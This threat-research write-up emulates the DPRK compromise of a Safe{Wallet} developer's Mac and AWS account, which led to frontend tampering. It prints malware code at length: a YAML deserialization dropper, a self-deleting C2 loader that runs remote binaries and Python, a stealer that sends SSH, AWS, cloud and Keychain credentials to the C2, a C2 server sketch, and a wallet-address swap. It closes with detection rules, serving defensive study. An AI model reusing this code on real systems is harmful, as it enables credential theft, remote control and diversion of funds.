<p>The application leverages <a href="https://streamlit.io/">Streamlit</a> to execute <code>app.py</code>, which imports the script <code>data_fetcher.py</code>.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/bit-bybit/image5.png" alt="Python Application README.txt usage" /></p>
<p>The <code>data_fetcher.py</code> script includes malicious functionality designed to reach out to an attacker-controlled domain.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/bit-bybit/image8.png" alt="data_fetcher.py class with yaml.load functionality" /></p>
<p>The script, by default, fetches valid stock market-related data. However, based on specific conditions, the attacker-controlled server can return a malicious YAML payload instead. When evaluated using PyYAML’s unsafe loader (<code>yaml.load()</code>), this payload allows for arbitrary Python object deserialization, resulting in RCE.</p>
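<p>To make the deserialization path concrete, the following is a minimal, self-contained sketch (not the actual sample) of how a YAML document parsed with an unsafe PyYAML loader executes a function call during deserialization:</p>

```python
import os
import yaml  # PyYAML

# Illustrative payload only, not the attacker's sample: the
# python/object/apply tag instructs the loader to call an arbitrary
# Python callable while parsing the document.
PAYLOAD = "!!python/object/apply:os.getcwd []"

# yaml.UnsafeLoader (like the legacy default loader) permits arbitrary
# object construction; yaml.safe_load() would reject this tag.
result = yaml.load(PAYLOAD, Loader=yaml.UnsafeLoader)
assert result == os.getcwd()  # the function ran during parsing
```

<p>Swapping <code>os.getcwd</code> for a subprocess-spawning callable is what turns this parsing quirk into full RCE, which is why <code>yaml.safe_load()</code> should always be preferred for untrusted input.</p>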
<h4>PyYAML Deserialization Payload</h4>
<p>(VT Hash: <code>47e997b85ed3f51d2b1d37a6a61ae72185d9ceaf519e2fdb53bf7e761b7bc08f</code>)</p>
<p>We recreated this malicious setup by hosting the YAML deserialization payload on a Python+Flask web application, using PythonAnywhere to mimic attacker infrastructure. We updated the malicious URL in the <code>data_fetcher.py</code> script to point to our PythonAnywhere-hosted YAML payload.</p>
<p>When PyYAML loads and executes the malicious YAML payload, it performs the following actions:</p>
<p>First, it creates a directory named <code>Public</code> in the victim’s home directory.</p>
<pre><code class="language-py">directory = os.path.expanduser(&quot;~&quot;)
directory = os.path.join(directory, &quot;Public&quot;)

if not os.path.exists(directory):
    os.makedirs(directory)
</code></pre>
<p>Next, it decodes and writes a base64-encoded Python loader script into a new file named <code>__init__.py</code> within the <code>Public</code> directory.</p>
<pre><code class="language-py">filePath = os.path.join(directory, &quot;__init__.py&quot;)

with open(filePath, &quot;wb&quot;) as f:
    f.write(base64.b64decode(b&quot;BASE64_ENCODED_LOADER_SCRIPT&quot;))
</code></pre>
<p>Finally, it executes the newly created <code>__init__.py</code> script silently in the background, initiating the second stage of the attack.</p>
<pre><code class="language-py">subprocess.Popen([sys.executable, filePath], start_new_session=True, stdout=DEVNULL, stderr=DEVNULL)
</code></pre>
<h4>Python Loader Script</h4>
<p>(VT Hash: <code>937c533bddb8bbcd908b62f2bf48e5bc11160505df20fea91d9600d999eafa79</code>)</p>
<p>To avoid leaving forensic evidence, the loader first deletes its file (<code>__init__.py</code>) after execution, leaving it running in memory only.</p>
<pre><code class="language-py">directory = os.path.join(home_directory, &quot;Public&quot;)

if not os.path.exists(directory):
    os.makedirs(directory)

try:
    body_path = os.path.join(directory, &quot;__init__.py&quot;)
    os.remove(body_path)
</code></pre>
<p>This loader’s primary goal is to establish continuous communication with the Command-and-Control (C2) server. It gathers basic system information—like OS type, architecture, and system version—and sends these details to the C2 via an HTTP POST request to the hardcoded <code>/club/fb/status</code> URL endpoint.</p>
<pre><code class="language-py">params = {
    &quot;system&quot;: platform.system(),
    &quot;machine&quot;: platform.machine(),
    &quot;version&quot;: platform.version()
}
while True:
    try:
        response = requests.post(url, verify=False, data=params, timeout=180)
</code></pre>
<p>Based on the server’s response (<code>ret</code> value), the loader decides its next steps.</p>
<h5>ret == 0:</h5>
<p>The script sleeps for 20 seconds and continues polling.</p>
<pre><code class="language-py">if res['ret'] == 0:
    time.sleep(20)
    continue
</code></pre>
<h5>ret == 1:</h5>
<p>The server response includes a Base64-encoded payload. The script decodes this payload and writes it to a file—named <code>init.dll</code> on Windows or <code>init</code> otherwise—and then dynamically loads the library using <code>ctypes.cdll.LoadLibrary</code>, which causes the payload to run as a native binary.</p>
<pre><code class="language-py">elif res['ret'] == 1:
    if platform.system() == &quot;Windows&quot;:
        body_path = os.path.join(directory, &quot;init.dll&quot;)
    else:
        body_path = os.path.join(directory, &quot;init&quot;)
        with open(body_path, &quot;wb&quot;) as f:
            binData = base64.b64decode(res[&quot;content&quot;])
            f.write(binData)
            os.environ[&quot;X_DATABASE_NAME&quot;] = &quot;&quot;
            ctypes.cdll.LoadLibrary(body_path)
</code></pre>
<h5>ret == 2:</h5>
<p>The script decodes the Base64 content into Python source code and then executes it using Python’s <code>exec()</code> function. This allows for running arbitrary Python code.</p>
<pre><code class="language-py">elif res['ret'] == 2:
    srcData = base64.b64decode(res[&quot;content&quot;])
    exec(srcData)
</code></pre>
<h5>ret == 3:</h5>
<p>The script decodes a binary payload (<code>dockerd</code>) and a binary configuration file (<code>docker-init</code>) into two separate files, sets their permissions to be executable, and then attempts to run them as a new process, supplying the config file as an argument to the binary payload. After execution of the binary payload, it deletes its executable file, leaving the config file on disk for reference.</p>
<pre><code class="language-py">elif res['ret'] == 3:
    path1 = os.path.join(directory, &quot;dockerd&quot;)
    with open(path1, &quot;wb&quot;) as f:
        binData = base64.b64decode(res[&quot;content&quot;])
        f.write(binData)

    path2 = os.path.join(directory, &quot;docker-init&quot;)
    with open(path2, &quot;wb&quot;) as f:
        binData = base64.b64decode(res[&quot;param&quot;])
        f.write(binData)

    os.chmod(path1, stat.S_IRUSR | stat.S_IWUSR | stat.S_IXUSR |
                    stat.S_IRGRP | stat.S_IXGRP |
                    stat.S_IROTH | stat.S_IXOTH)

    os.chmod(path2, stat.S_IRUSR | stat.S_IWUSR | stat.S_IXUSR |
                    stat.S_IRGRP | stat.S_IXGRP |
                    stat.S_IROTH | stat.S_IXOTH)

    try:
        process = subprocess.Popen([path1, path2], start_new_session=True)
        process.communicate()
        return_code = process.returncode
        requests.post(SERVER_URL + '/club/fb/result', verify=False, data={&quot;result&quot;: str(return_code)})
    except:
        pass

    os.remove(path1)
</code></pre>
<h5>ret == 9:</h5>
<p>The script breaks out of its polling loop, terminating further actions.</p>
<pre><code class="language-py">elif res['ret'] == 9:
    break
</code></pre>
<p>After processing any command, the script continues to poll for further instructions from the C2 server.</p>
<h4>Python Loader Emulation</h4>
<p>Our goal was to test each of the command options within the loader to better understand what was happening, collect relevant telemetry data, and analyze it for the purpose of building robust detections for both our endpoint and the SIEM.</p>
<h5>Ret == 1: Write Library to Disk, Load and Delete Dylib</h5>
<p>The payload we used for this option was a <a href="https://github.com/MythicAgents/poseidon">Poseidon</a> payload compiled as a shared library (<code>.dylib</code>).</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/bit-bybit/image9.png" alt="Mythic C2 Payload Builder" /></p>
<p>We then base64-encoded the binary and were able to hardcode the path to that base64-encoded payload in our C2 server to be served when testing this specific loader command.</p>
<pre><code class="language-shell">base64 poseidon.dylib &gt; poseidon.b64
</code></pre>
<pre><code class="language-py">BINARY_PAYLOAD_B64 = &quot;BASE64_ENCODED_DYLIB_PAYLOAD&quot;  # For ret==1
STEALER_PAYLOAD_B64 = &quot;BASE64_ENCODED_STEALER_SCRIPT&quot; # For ret==2
MULTI_STAGE_PAYLOAD_B64 = &quot;BASE64_ENCODED_MULTISTAGE_PAYLOAD&quot; # For ret==3
# For testing we simulate a command to send.
# Options: 0, 1, 2, 3, 9.
# 0: Idle (sleep); 1: Execute native binary; 2: Execute Python code; 3: Execute multi-stage payload; 9: Terminate.
COMMAND_TO_SEND = 1   # Change this value to test different actions
</code></pre>
<p>Once we received our Poseidon payload callback to our <a href="https://github.com/its-a-feature/Mythic">Mythic C2</a> we were able to retrieve credentials using a variety of different methods provided by Poseidon.</p>
<p>Option 1: <a href="https://github.com/MythicAgents/poseidon/blob/master/documentation-payload/poseidon/commands/download.md">download command</a> - Access file, reads content, sends data back to C2.<br />
Option 2: <a href="https://github.com/MythicAgents/poseidon/blob/master/documentation-payload/poseidon/commands/getenv.md">getenv command</a> - Read user environment variables and send content back to C2.<br />
Option 3: <a href="https://github.com/MythicAgents/poseidon/blob/master/Payload_Type/poseidon/poseidon/agentfunctions/jsimport.go">jsimport</a> &amp; <a href="https://github.com/MythicAgents/poseidon/blob/master/Payload_Type/poseidon/poseidon/agentfunctions/jsimport_call.go">jsimport_call</a> commands - Import JXA script into memory then call a method within the JXA script to retrieve credentials from file and return contents.</p>
<h5>Ret == 2: Receive and Execute arbitrary Python code within Process Memory</h5>
<p>(VT Hash: <code>e89bf606fbed8f68127934758726bbb5e68e751427f3bcad3ddf883cb2b50fc7</code>)</p>
<p>The loader script allows arbitrary Python code or scripts to be run in memory. In Unit42’s blog, they provided a Python script they observed the DPRK executing via this return value. This script collects a vast amount of data, XOR-encodes it, and sends it back to the C2 server via a POST request. For the emulation, all that was needed was to add our C2 URL with the appropriate route as defined in our C2 server, base64-encode the script, and hardcode its path within our server for when this option was tested.</p>
<pre><code class="language-py">def get_info():
    global id
    id = base64.b64encode(os.urandom(16)).decode('utf-8')
    
    # get xor key
    while True:
        if not get_key():
            break

        base_info()
        send_directory('home/all', '', home_dir)
        send_file('keychain', os.path.join(home_dir, 'Library', 'Keychains', 'login.keychain-db'))
        send_directory('home/ssh', 'ssh', os.path.join(home_dir, '.ssh'), True)
        send_directory('home/aws', 'aws', os.path.join(home_dir, '.aws'), True)
        send_directory('home/kube', 'kube', os.path.join(home_dir, '.kube'), True)
        send_directory('home/gcloud', 'gcloud', os.path.join(home_dir, '.config', 'gcloud'), True)
        finalize()
        break
</code></pre>
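<p>The XOR-then-POST exfiltration step is simple to sketch. Key handling and data below are placeholders and assumptions; the real script fetches its key from the C2:</p>

```python
import base64

def xor_encode(data: bytes, key: bytes) -> bytes:
    # Repeating-key XOR, a common lightweight exfiltration obfuscation
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))

secret = b"login.keychain-db contents"    # placeholder collected data
blob = xor_encode(secret, b"k3y")         # placeholder key
assert xor_encode(blob, b"k3y") == secret # XOR is its own inverse
body = base64.b64encode(blob)             # what a POST body might carry
```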
<h5>Ret == 3: Write Binary Payload and Binary Config to Disk, Execute Payload and Delete File</h5>
<p>For ret == 3, we used a standard Poseidon binary payload and a “configuration file” containing binary data, as specified in the loader script. As with the ret == 1 option above, we base64-encoded both files, hardcoded their paths in our C2 server for serving when testing this command, and then used the same Poseidon commands to collect credentials from the target system.</p>
<h4>C2 Infrastructure</h4>
<p>We created a small C2 server, built with Python+Flask, intended to listen on a specified port on our Kali Linux VM and evaluate incoming requests, responding appropriately based on the route and the return value we wished to test.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/bit-bybit/image15.png" alt="Custom Python+Flask C2 Server" /></p>
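<p>A minimal sketch of such a route handler is shown below. The route (<code>/club/fb/status</code>) and the response fields (<code>ret</code>, <code>content</code>) mirror the loader logic described above; the command constant and payload value are placeholders for illustration:</p>

```python
import base64
from flask import Flask, jsonify

app = Flask(__name__)

COMMAND_TO_SEND = 2  # which loader branch to exercise (0, 1, 2, 3, or 9)
STEALER_PAYLOAD_B64 = base64.b64encode(b"print('stealer ran')").decode()

@app.route("/club/fb/status", methods=["POST"])
def status():
    # The loader POSTs system/machine/version and expects a ret code;
    # for ret == 2 it also expects a base64-encoded Python payload
    # that it will pass to exec().
    if COMMAND_TO_SEND == 2:
        return jsonify(ret=2, content=STEALER_PAYLOAD_B64)
    return jsonify(ret=COMMAND_TO_SEND)
```

<p>Changing <code>COMMAND_TO_SEND</code> between runs let us exercise each branch of the loader's polling loop.</p>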
<p>We also used the open source <a href="https://github.com/its-a-feature/Mythic">Mythic C2</a> in order to facilitate the creation and management of the Poseidon payloads we used. Mythic is an open source C2 framework created and maintained by <a href="https://github.com/its-a-feature">Cody Thomas</a> at <a href="https://specterops.io/">SpecterOps</a>.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/bit-bybit/image14.png" alt="Mythic C2 Active Callbacks Interactive Agent Window" /></p>
<h4>Malicious Python Application: Docker Version</h4>
<p>We also explored a Dockerized variant of the malicious Python application. This version was packaged in a minimal Python Docker container (<code>python:3.12.2-slim</code>) running in privileged mode, granting it the ability to access host resources.</p>
<p>A containerized application creates a telemetry and detection blind spot on macOS because Apple's Endpoint Security Framework (ESF) lacks the ability to introspect containerized processes. While ESF and endpoint detection solutions can still observe the trusted Docker process accessing sensitive host files—such as SSH keys, AWS credentials, or user configuration data—these actions commonly align with standard developer workflows. As a result, security tools are less likely to scrutinize or trigger alerts on containerized activities, offering attackers increased stealth when operating from within Docker environments.</p>
<p>This highlights the necessity for additional monitoring like <a href="https://www.osquery.io/">OSQuery</a> and <a href="https://www.docker.com/">Docker</a> log file collection to complement standard macOS endpoint defenses. Elastic offers both <a href="https://www.elastic.co/es/docs/reference/integrations/osquery_manager">OSQuery</a> and <a href="https://www.elastic.co/es/docs/reference/beats/filebeat/filebeat-input-container">Docker</a> log file collection via our <a href="https://www.elastic.co/es/integrations/data-integrations">data integrations</a> for Elastic Agent alongside our Endpoint protection features.</p>
<h4>macOS Emulation Conclusion</h4>
<p>Our emulation recreated the attack against the SAFE developer’s macOS system end-to-end using the real-world payloads.</p>
<p><strong>Malicious Python App:</strong></p>
<p>We began by replicating the malicious Python application described in both Mandiant’s findings and Unit42’s report. The attackers had forked a legitimate open-source application and embedded RCE access within <code>data_fetcher.py</code>. This script made outbound requests to an attacker-controlled server and conditionally fetched a malicious YAML file. Using PyYAML’s <code>yaml.load()</code> with an unsafe loader, the attacker triggered arbitrary code execution via deserialization.</p>
<p><strong>PyYAML Payload Deserialization resulting in Python Loader Script Execution:</strong></p>
<p>The YAML payload wrote a base64-encoded second-stage loader to <code>~/Public/__init__.py</code> and executed it in a detached process. We mimicked this exact flow using a Flask-based staging server hosted on PythonAnywhere.</p>
<p><strong>Python Loader Execution &amp; C2 Interaction:</strong></p>
<p>Once launched, the loader deleted its on-disk file, beaconed to our emulated C2, and awaited tasking. Based on the C2’s response code (<code>ret</code>), we tested the following actions:</p>
<ul>
<li><strong>ret == 1</strong>: The loader decoded a Poseidon payload (compiled as a <code>.dylib</code>) and executed it using <code>ctypes.cdll.LoadLibrary()</code>, resulting in native code execution from disk.</li>
<li><strong>ret == 2</strong>: The loader executed an in-memory Python stealer, matching the script shared by Unit42. This script collected system, user, browser, and credential data and exfiltrated it via XOR-encoded POST requests.</li>
<li><strong>ret == 3</strong>: The loader wrote a Poseidon binary and a separate binary configuration file to disk, executed the binary with the config as an argument, then deleted the payload.</li>
<li><strong>ret == 9</strong>: The loader terminated its polling loop.</li>
</ul>
<p><strong>Data Collection: Pre-Pivot Recon &amp; Credential Access:</strong></p>
<p>During our <strong>ret == 2</strong> test, the Python stealer gathered:</p>
<ul>
<li>macOS system information (<code>platform</code>, <code>os</code>, <code>user</code>)</li>
<li>Chrome user data (Bookmarks, Cookies, Login Data, etc.)</li>
<li>SSH private keys (<code>~/.ssh</code>)</li>
<li>AWS credentials (<code>~/.aws/credentials</code>)</li>
<li>macOS Keychain files (<code>login.keychain-db</code>)</li>
<li>GCP/Kube config files from <code>.config/</code></li>
</ul>
<p>This emulates the pre-pivot data collection that preceded cloud exploitation, and reflects how DPRK actors harvested AWS credentials from the developer’s local environment.</p>
<p>With valid AWS credentials, the threat actors then pivoted into the cloud environment, launching the second phase of this intrusion.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/bit-bybit/image22.png" alt="AWS cloud compromise execution flow" /></p>
<h3>AWS cloud compromise</h3>
<h4>Prerequisites and Setup</h4>
<p>To emulate the AWS stage of this attack, we first leveraged Terraform to stand up the necessary infrastructure. This included creating an IAM user (developer) with an overly permissive IAM policy granting access to S3, IAM, and STS APIs. We then pushed a locally built Next.js application to an S3 bucket and confirmed the site was live, simulating a simple Safe{Wallet} frontend.</p>
<p>Our choice of <code>Next.js</code> was predicated on the original S3 bucket static site path - <code>https://app[.]safe[.]global/_next/static/chunks/pages/_app-52c9031bfa03da47.js</code></p>
<p>Before injecting any malicious code, we verified the integrity of the site by performing a test transaction using a known target wallet address to ensure the application responded as expected.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/bit-bybit/image1.png" alt="Transaction by custom frontend static site" /></p>
<h4>Temporary Session Token Retrieval</h4>
<p>Following the initial access and post-compromise activity on the developer’s macOS workstation, early assumptions focused on the adversary retrieving credentials from default AWS configuration locations, such as the <code>~/.aws</code> files or user environment variables. Unit42’s blog later confirmed that the Python stealer script targeted AWS files. These locations often store long-term IAM credentials or temporary session tokens used in standard development workflows. Based on public reporting, however, this specific compromise involved AWS user session tokens, not long-term IAM credentials. In our emulation, acting as the developer, we added a virtual MFA device to our IAM user, enabled it, retrieved a user session token, and exported the credentials to our environment. Note that on our Kali Linux endpoint, we leveraged ExpressVPN - as done by the adversaries - for any AWS API calls or interactions with the developer box.</p>
<p>It is suspected that the developer obtained temporary AWS credentials either by the <a href="https://docs.aws.amazon.com/STS/latest/APIReference/API_GetSessionToken.html">GetSessionToken</a> API operation or by logging in via AWS Single Sign-On (SSO) using the AWS CLI. Both methods result in short-lived credentials being cached locally and usable for CLI or SDK-based interactions. These temporary credentials were then likely cached in the <code>~/.aws</code> files or exported as environment variables on the macOS system.</p>
<p>In the <em>GetSessionToken</em> scenario, the developer would have executed a command such as:</p>
<pre><code class="language-shell">aws sts get-session-token --serial-number &quot;$ARN&quot; --token-code &quot;$FINAL_CODE&quot;  --duration-seconds 43200 --profile &quot;$AWS_PROFILE&quot; --output json
</code></pre>
<p>In the SSO-based authentication scenario, the developer may have run:</p>
<pre><code class="language-shell">aws configure sso
aws sso login --profile &quot;$AWS_PROFILE&quot; --use-device-code
</code></pre>
<p>Either method results in temporary credentials (access key, secret and session token) being saved in <code>~/.aws</code> files and made available to the configured AWS profile. These credentials are then used automatically by tools like the AWS CLI or SDKs like Boto3 unless overridden. In either case, if malware or an adversary had access to the developer’s macOS system, these credentials could have been easily harvested from the environment variables, AWS config cache or credentials file.</p>
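<p>For illustration, cached temporary credentials are trivially readable with nothing more than the standard library. The profile name and values below are placeholders; the <code>ASIA</code> prefix marks STS-issued temporary access keys:</p>

```python
import configparser

# Hypothetical ~/.aws/credentials content after a GetSessionToken call;
# in practice a stealer would read os.path.expanduser("~/.aws/credentials")
CREDENTIALS_FILE = """\
[developer]
aws_access_key_id = ASIAEXAMPLEACCESSKEY
aws_secret_access_key = examplesecretaccesskey
aws_session_token = exampletemporarysessiontoken
"""

config = configparser.ConfigParser()
config.read_string(CREDENTIALS_FILE)
profile = config["developer"]

# Temporary (STS) credentials carry an ASIA access-key prefix and a session token
assert profile["aws_access_key_id"].startswith("ASIA")
assert "aws_session_token" in profile
```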
<p>To obtain these credentials for Developer1, we created a custom script for quick automation. It created a virtual MFA device in AWS, registered the device to our Developer1 user, then called <code>GetSessionToken</code> from STS, adding the returned temporary user session credentials to our macOS endpoint as environment variables, as shown below.</p>
<h4>MFA Device Registration Attempts</h4>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/bit-bybit/image20.png" alt="Registering our MFA device for the developer and retrieving user session token via shellscript" /></p>
<p>One key assumption here is that the developer was working with a user session that had MFA enabled, either for direct use or to assume a custom-managed IAM role. Our assumption derives from the credential material compromised - AWS temporary user session tokens, which are not obtained from the console but rather requested on demand from STS. Temporary credentials returned from <code>GetSessionToken</code> or SSO by default expire after a certain number of hours, and a session token with the ASIA* prefix would suggest that the adversary harvested a short-lived but high-impact credential. This aligns with behaviors seen in previous DPRK-attributed attacks where credentials and configurations for Kubernetes, GCP, and AWS were extracted and reused.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/bit-bybit/image11.png" alt="Environment variables output of our AWS user session token after GetSessionToken call" /></p>
<h4>Assuming the Compromised Identity on Kali</h4>
<p>Once the AWS session token was collected, the adversary likely stored it on their Kali Linux system either in the standard AWS credential locations (e.g., <code>~/.aws/credentials</code> or as environment variables) or potentially in a custom file structure, depending on tooling in use. While the AWS CLI defaults to reading from <code>~/.aws/credentials</code> and environment variables, a Python script leveraging Boto3 could be configured to source credentials from nearly any file or path. Given the speed and precision of the post-compromise activity, it is plausible that the attacker used either the AWS CLI, direct Boto3 SDK calls, or shell scripts wrapping CLI commands - all of which offer convenience and built-in request signing.</p>
<p>What seems less likely is that the attacker manually signed AWS API requests using SigV4, as this would be unnecessarily slow and operationally complex. It’s also important to note that no public blog has disclosed which user agent string was associated with the session token usage (e.g., aws-cli, botocore, etc.), which leaves uncertainty around the attacker’s exact tools. That said, given DPRK’s established reliance on Python and the speed of the attack, CLI or SDK usage remains the most reasonable assumption.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/bit-bybit/image16.png" alt="MythicC2 getenv command output" /></p>
<p><strong>Note:</strong> We did this in emulation with our Poseidon payload prior to Unit 42’s blog about the RN Loader capabilities.</p>
<p>It’s important to clarify a nuance about the AWS authentication model: using a session token does not <a href="https://docs.aws.amazon.com/IAM/latest/UserGuide/id_credentials_temp_control-access_getsessiontoken.html">inherently block access to IAM API actions</a> - even actions like <a href="https://docs.aws.amazon.com/IAM/latest/APIReference/API_CreateVirtualMFADevice.html">CreateVirtualMFADevice</a> - as long as the session was initially established with MFA. In our emulation, we attempted to replicate this behavior using a stolen session token that had MFA context. Interestingly, our attempts to register an additional MFA device failed. This suggests either that additional safeguards, such as explicit policy constraints, prevent MFA registration via session tokens, or that the publicly reported details are still too vague and we mimicked the behavior incorrectly. While the exact failure reason remains unclear, it warrants deeper investigation into the IAM policies and authentication context associated with session-bound actions.</p>
<h4>S3 Asset Enumeration</h4>
<p>After credential acquisition, the attacker likely enumerated accessible AWS services. In this case, Amazon S3 was a clear target. The attacker would have listed buckets available to the compromised identity across all regions and located a public-facing bucket associated with Safe{Wallet}, which hosted the frontend Next.js application for transaction processing.</p>
<p>We assume the attacker was aware of the S3 bucket due to its role in serving content for <code>app.safe[.]global</code>, meaning the bucket's structure and assets could be publicly browsed or downloaded without authentication. In our emulation, we validated similar behavior by syncing assets from a public S3 bucket used for static site hosting.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/bit-bybit/image6.png" alt="Bucket containing statically hosted frontend static site assets" /></p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/bit-bybit/image21.png" alt="Statically hosted frontend static site assets in target bucket" /></p>
<h4>Next.js App Overwrite with Malicious Code</h4>
<p>After discovering the bucket, the attacker likely used the aws s3 <a href="https://docs.aws.amazon.com/cli/latest/reference/s3/sync.html">sync</a> command to download the entire contents, which included the bundled frontend JavaScript assets. Between February 5 and February 19, 2025, they appeared to focus on modifying these assets - specifically, files like <code>main.&lt;HASH&gt;.js</code> and related routes, which are output by <code>Next.js</code> during its build process and stored under the <code>_next/static/chunks/pages/</code> directory. These bundled files contain the transpiled application logic, and according to Sygnia's forensic report, a file named <code>_app-52c9031bfa03da47.js</code> was the primary injection point for the malicious code.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/bit-bybit/image23.png" alt="Leveraging AWS CLI sync command to download bucket contents" /></p>
<p>Next.js applications, when built, typically store their statically generated assets under the <code>_next/static/</code> directory, with JavaScript chunks organized into folders like <code>/chunks/pages/</code>. In this case, the adversary likely formatted and deobfuscated the JavaScript bundle to understand its structure, then reverse engineered the application logic. After identifying the code responsible for handling user-entered wallet addresses, they injected their payload. This payload introduced conditional logic: if the entered wallet address matched one of several known target addresses, it would silently replace the destination with a DPRK-controlled address, redirecting funds without the user becoming aware.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/bit-bybit/image4.png" alt="" /></p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/bit-bybit/image7.png" alt="Modifying the non-formatted bundled static site code of our own app" /></p>
<p>In our emulation, we replicated this behavior by modifying the <code>TransactionForm.js</code> component to check if the entered recipient address matched specific values. If so, the address was replaced with an attacker-controlled wallet. While this does not reflect the complexity of actual smart contract manipulation or delegate calls used in the real-world attack, it serves as conceptual behavior to illustrate how a compromised frontend could silently redirect cryptocurrency transactions.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/bit-bybit/image2.png" alt="Our static site frontend script pop-up notifying the target wallet address condition was met after malicious code upload" /></p>
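<p>The swap logic from our emulation can be re-expressed in Python for clarity (the actual payload, like the modified <code>TransactionForm.js</code>, was JavaScript). Both wallet addresses below are hypothetical placeholders, not real indicators.</p>

```python
# Hedged Python re-expression of the conditional address-swap logic we
# injected during the emulation. Addresses are made-up placeholders.
TARGET_ADDRESSES = {"0xVICTIM_COLD_WALLET"}        # hypothetical watched address
ATTACKER_ADDRESS = "0xATTACKER_CONTROLLED_WALLET"  # hypothetical attacker wallet

def resolve_recipient(entered_address: str) -> str:
    """Silently swap the destination when a watched address is entered."""
    if entered_address in TARGET_ADDRESSES:
        return ATTACKER_ADDRESS  # redirected without the user's awareness
    return entered_address  # all other transactions behave normally
```

<p>The key property, and the reason this class of tampering is hard to spot, is that every transaction except the targeted ones behaves exactly as expected.</p>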
<h4>Static Site Tampering Implications and Missing Security Controls</h4>
<p>This type of frontend tampering is especially dangerous in Web3 environments, where decentralized applications (dApps) often rely on static, client-side logic to process transactions. By modifying the JavaScript bundle served from the S3 bucket, the attacker was able to subvert the application’s behavior without needing to breach backend APIs or smart contract logic.</p>
<p>We assume that protections such as <a href="https://docs.aws.amazon.com/AmazonS3/latest/userguide/object-lock.html">S3 Object Lock</a>, Content-Security-Policy (CSP), or Subresource Integrity (SRI) headers were either not in use or not enforced during the time of compromise. The absence of these controls would have allowed an attacker to modify static frontend code without triggering browser or backend integrity validation, making such tampering significantly easier to carry out undetected.</p>
<h2>Lessons in defense</h2>
<p>A successful emulation—or real-world incident response—doesn’t end with identifying attacker behaviors. It continues with reinforcing defenses to prevent similar techniques from succeeding again. Below, we outline key detections, security controls, mitigation strategies, and Elastic features that can help reduce risk and limit exposure to the tactics used in this emulation and in-the-wild (ItW) campaigns like the Safe{Wallet} compromise.</p>
<p><strong>Note:</strong> These detections are actively maintained and regularly tuned, and may evolve over time. Depending on your environment, additional tuning may be required to minimize false positives and reduce noise.</p>
<h2>Elastic’s SIEM detection and endpoint prevention rules</h2>
<p>Once we understand adversary behavior through emulation and implement security controls to harden the environment, it’s equally important to explore detection opportunities and capabilities to identify and respond to these threats in real time.</p>
<h4><a href="https://github.com/elastic/protections-artifacts/tree/main/behavior/rules/macos">macOS Endpoint Behavior Prevention Rules</a></h4>
<h5>Python PyYAML Deserialization Payload</h5>
<p><strong>Rule Name: “<a href="https://github.com/elastic/detection-rules/blob/bbfc026c95fbd9491cdbd06e779e1598ad63a31f/hunting/macos/docs/execution_python_script_drop_and_execute.md">Python Script Drop and Execute</a>”:</strong> Detects when a Python script gets created or modified followed immediately by the execution of that script by the same Python process.</p>
<h5>Python Loader Script</h5>
<p><strong>Rule Name: “<a href="https://github.com/elastic/detection-rules/blob/bbfc026c95fbd9491cdbd06e779e1598ad63a31f/hunting/macos/docs/defense_evasion_self_deleting_python_script.md">Self-Deleting Python Script</a>”:</strong> Detects when a Python script executes and that script file is immediately deleted by the same Python process.</p>
<p><strong>Rule Name: “<a href="https://github.com/elastic/detection-rules/blob/84966f02a1b71cce13db22b6c348cb46560529b7/hunting/macos/docs/defense_evasion_self_deleted_python_script_outbound_network_connection.md">Self-Deleted Python Script Outbound Connection</a>”:</strong> Detects when a Python script gets deleted and an outbound network connection occurs shortly after by the same Python process.</p>
<h5>Python Loader Script Ret == 1</h5>
<p><strong>Rule Name: “<a href="https://github.com/elastic/detection-rules/blob/84966f02a1b71cce13db22b6c348cb46560529b7/hunting/macos/docs/command_and_control_suspicious_executable_file_creation_via_python.md">Suspicious Executable File Creation via Python</a>”:</strong> Detects when an executable file gets created or modified by Python in suspicious or unusual directories.</p>
<p><strong>Rule Name: “<a href="https://github.com/elastic/detection-rules/blob/bbfc026c95fbd9491cdbd06e779e1598ad63a31f/hunting/macos/docs/defense_evasion_python_library_load_and_delete.md">Python Library Load and Delete</a>”:</strong> Detects when a shared library, located within the user’s home directory, gets loaded by Python followed by the deletion of the library shortly after by the same Python process.</p>
<p><strong>Rule Name: “<a href="https://github.com/elastic/detection-rules/blob/bbfc026c95fbd9491cdbd06e779e1598ad63a31f/hunting/macos/docs/execution_unusual_library_load_via_python.md">Unusual Library Load via Python</a>”:</strong> Detects when a shared library gets loaded by Python that does not denote itself as a .dylib or .so file and is located within the user’s home directory.</p>
<p><strong>Rule Name: “<a href="https://github.com/elastic/endpoint-rules/blob/13bad7e92e53f078b97bbeb376aedb23797be21b/rules/macos/defense_evasion_potential_in_memory_jxa_load_via_untrusted_or_unsigned_binary.toml">In-Memory JXA Execution via ScriptingAdditions</a>”:</strong> Detects the in-memory load and execution of a JXA script.</p>
<h5>Python Loader Script Ret == 2</h5>
<p><strong>Rule Name: “<a href="https://github.com/elastic/detection-rules/blob/bbfc026c95fbd9491cdbd06e779e1598ad63a31f/hunting/macos/docs/credential_access_potential_python_stealer.md">Potential Python Stealer</a>”:</strong> Detects when a Python script gets executed followed shortly after by at least three attempts to access sensitive files by the same Python process.</p>
<p><strong>Rule Name: “<a href="https://github.com/elastic/detection-rules/blob/bbfc026c95fbd9491cdbd06e779e1598ad63a31f/hunting/macos/docs/defense_evasion_self_deleted_python_script_accessing_sensitive_files.md">Self-Deleted Python Script Accessing Sensitive Files</a>”:</strong> Detects when a Python script gets deleted and sensitive files are accessed shortly after by the same Python process.</p>
<h5>Python Loader Script Ret == 3</h5>
